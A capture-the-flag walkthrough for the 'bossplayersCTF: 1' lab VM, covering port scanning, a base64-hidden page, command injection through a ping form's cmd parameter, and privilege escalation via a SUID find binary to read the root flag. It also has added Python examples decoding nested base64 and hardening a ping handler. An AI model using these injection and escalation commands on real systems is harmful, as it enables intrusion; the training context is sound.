bossplayersCTF: 1

Description
Aimed at beginner security professionals who want to get their feet wet doing some CTFs. It should take around 30 minutes to root.

Write-Up

The VM configuration is as follows:

Scan vmnet1:
hausa@debian:~/visualmachine$fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.130

Scan 172.16.1.130:
hausa@debian:~/visualmachine$ nmap -A -p 1-65535 172.16.1.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 00:38 EDT
Nmap scan report for 172.16.1.130
Host is up (0.000057s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
| 256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_ 256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn’t have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds

Ports 22/ssh and 80/http are open.
Visit port 80.
F12 (developer tools) shows a comment at the very bottom of the page: WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
After several layers of base64 decoding it is:
workinginprogress.php
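The comment is base64 wrapped three times, which is tedious to peel by hand. The following helper, an added example and not part of the original write-up, decodes repeatedly until the result stops looking like base64 (wrong length, characters outside the alphabet, or non-printable output), so it also copes with an unknown number of layers. The only input it uses is the comment string taken from the page.

```python
import base64
import binascii
import re
from typing import Tuple

# Comment found in the page source of the target (value copied from the write-up).
PAGE_COMMENT = "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK"

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(s: str) -> bool:
    """Cheap pre-check: base64 alphabet only and a length that is a multiple of 4."""
    s = s.strip()
    return len(s) > 0 and len(s) % 4 == 0 and bool(_B64_RE.match(s))


def peel_base64(data: str, max_layers: int = 10) -> Tuple[str, int]:
    """Strip nested base64 layers.

    Returns (plaintext, layers_removed). Decoding stops as soon as a layer
    is not valid base64 or does not decode to printable ASCII, which keeps
    a plaintext that merely resembles base64 from being mangled.
    """
    current = data.strip()
    layers = 0
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break
        if not text.strip().isprintable():
            break
        current = text.strip()
        layers += 1
    return current, layers


if __name__ == "__main__":
    plaintext, layers = peel_base64(PAGE_COMMENT)
    print(f"{layers} layer(s) removed -> {plaintext}")
```

Running it on the page's comment reports three layers and yields workinginprogress.php; the same function handles the single-layer flag at the end of the box.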
Try opening it.
It shows: Test ping command – [ ]
Try for RCE.
172.16.1.130/workinginprogress.php?cmd=ls
index.html logs.php robots.txt workinginprogress.php
It really works.
172.16.1.130/workinginprogress.php?cmd=whoami
www-data
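The write-up does not show the PHP behind the ping form, but the behaviour (any value of cmd is executed as www-data) is the classic pattern of pasting user input into a shell string. The following is an added example, not the box's code: it shows that pattern next to a hardened handler that accepts only a literal IP address and passes an argv list to the process without a shell, so metacharacters are never interpreted. The function names are my own.

```python
import ipaddress
import subprocess
from typing import List


def vulnerable_shell_string(target: str) -> str:
    """Assumed shape of the bug: the user value is concatenated into a shell
    command line, so ';', '|', '&&' or '$(...)' in `target` become commands."""
    return "ping -c 1 " + target


def validate_ping_target(target: str) -> str:
    """Allow only a literal IPv4/IPv6 address; anything else is rejected."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        raise ValueError(f"refusing ping target {target!r}: not an IP address")


def is_safe_target(target: str) -> bool:
    """Boolean form of the validator, convenient for form handling and tests."""
    try:
        validate_ping_target(target)
        return True
    except ValueError:
        return False


def build_ping_command(target: str) -> List[str]:
    """Return an argv list: with shell=False there is no /bin/sh to parse it."""
    return ["ping", "-c", "1", validate_ping_target(target)]


def run_ping(target: str) -> int:
    """Execute the validated command directly; the return code says whether the host answered."""
    result = subprocess.run(build_ping_command(target), capture_output=True, timeout=10)
    return result.returncode


if __name__ == "__main__":
    print(build_ping_command("127.0.0.1"))
```

Restricting the target to an address rather than any hostname is a deliberate choice: it removes the need to reason about what the shell, DNS or ping itself might do with unusual strings. If hostnames must be supported, validate them against a strict hostname grammar and still use the argv form.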
172.16.1.130/workinginprogress.php?cmd=find /bin /sbin /usr/bin /usr/sbin -perm -4000
/usr/bin/mount /usr/bin/umount /usr/bin/gpasswd /usr/bin/su /usr/bin/chsh /usr/bin/grep /usr/bin/chfn /usr/bin/passwd /usr/bin/find /usr/bin/newgrp
find is there. From here on it is the same as DC-1.
172.16.1.130/workinginprogress.php?cmd=find robots.txt -exec whoami \;
root
172.16.1.130/workinginprogress.php?cmd=find robots.txt -exec ls /root \;
root.txt
172.16.1.130/workinginprogress.php?cmd=find robots.txt -exec cat /root/root.txt \;
Y29uZ3JhdHVsYXRpb25zCg==
Finally, decode it: congratulations

Summary

I looked at other people's approaches; they all popped a reverse shell.
I'm not very good at that yet; I need to study it.